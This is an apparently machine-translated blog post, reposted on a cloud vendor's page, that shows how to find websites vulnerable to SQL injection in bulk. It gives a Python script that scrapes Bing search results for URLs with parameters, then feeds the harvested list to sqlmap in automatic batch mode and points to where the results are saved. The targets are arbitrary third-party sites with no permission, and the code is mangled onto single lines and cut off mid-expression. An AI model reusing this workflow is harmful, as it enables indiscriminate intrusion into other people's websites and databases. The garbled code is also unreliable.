Batch Find injection PYTHON3+SQLMAP combination

Source: Internet
Author: User

Injection has always been using sqlmap to lead to an otherwise less proficient manual injection now forget it all
Want to practice but for a while and can not find an injection of the site so there is this article

I want to find a tool to get the domain name link in bulk, but it's just getting the domain name and not getting back the parameters.
So I wrote a
Get only the results of the previous 10 pages of Bing enter Q to end the loop and start organizing the data

#!/usr/bin/env python#-*-conding:utf-8-*-import reimport Urllib.request,urllib.parselogo = ' _______ ___ ___  _        |__   __|          / _ \   / _ \  | |    | |  | | | | | | | | | |    ___     | | | | | | | | | | | |    / __|    | | | |_| | | |_| | | |     \__ \    |_| \___/\___/|_| |___/"Print (logo) def obtain_url (): #爬抓bing获取url page = [' ', ' &first=11&form=pere ', ' &f Irst=21&form=pere1 ', ' &first=31&form=pere2 ', ' &first=41&form=pere3 ', ' &first=51&FOR M=pere4 ', ' &first=61&form=pere5 ', ' &first=71&form=pere6 ', ' &first=81&form=pere7 ', ' &amp ; First=91&form=pere8 '] headers = {' user-agent ': R ' mozilla/5.0 (Windows NT 6.1; WOW64) applewebkit/537.36 (khtml, like Gecko) ' R ' chrome/45.0.2454.85 safari/537.36 115browser/6.0.3 '  , ' Referer ': R ' http://www.baidu.com ', ' Connection ': ' keep-alive '} while True: #一直循环输入关键字 Crux = INPUT (' Please enter keyword: ') if crux = = ' Q ': #判断关键字是否为q is on end loop break crux = Urllib.parse.quote (Crux) #解决编码报错问 Title with open (' Url.txt ', ' a ', encoding= ' Utf-8 ') as f:for i in page:content = Urllib.reque St. Request (' https://cn.bing.com/search?q= ' +crux+i,headers=headers) contents = urllib.request.urlopen (content).                Read (). Decode (' utf-8 ') res = Re.compile (R ' 


Input Q
End loop and start processing data

Url.txt is crawling the linked data
New_url.txt is the processed data

Copy new_url.txt to Sqlmap root directory

sqlmap.py -m new_url.txt --batch --smart

-M is a batch injection with New_url.txt inside--batch automatically select--smart Fast injection

The results of the injection are under the C:\Users\Administrator\.sqlmap\output file
In a file like Results-04242018_0624pm.csv

Batch Find injection PYTHON3+SQLMAP combination

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.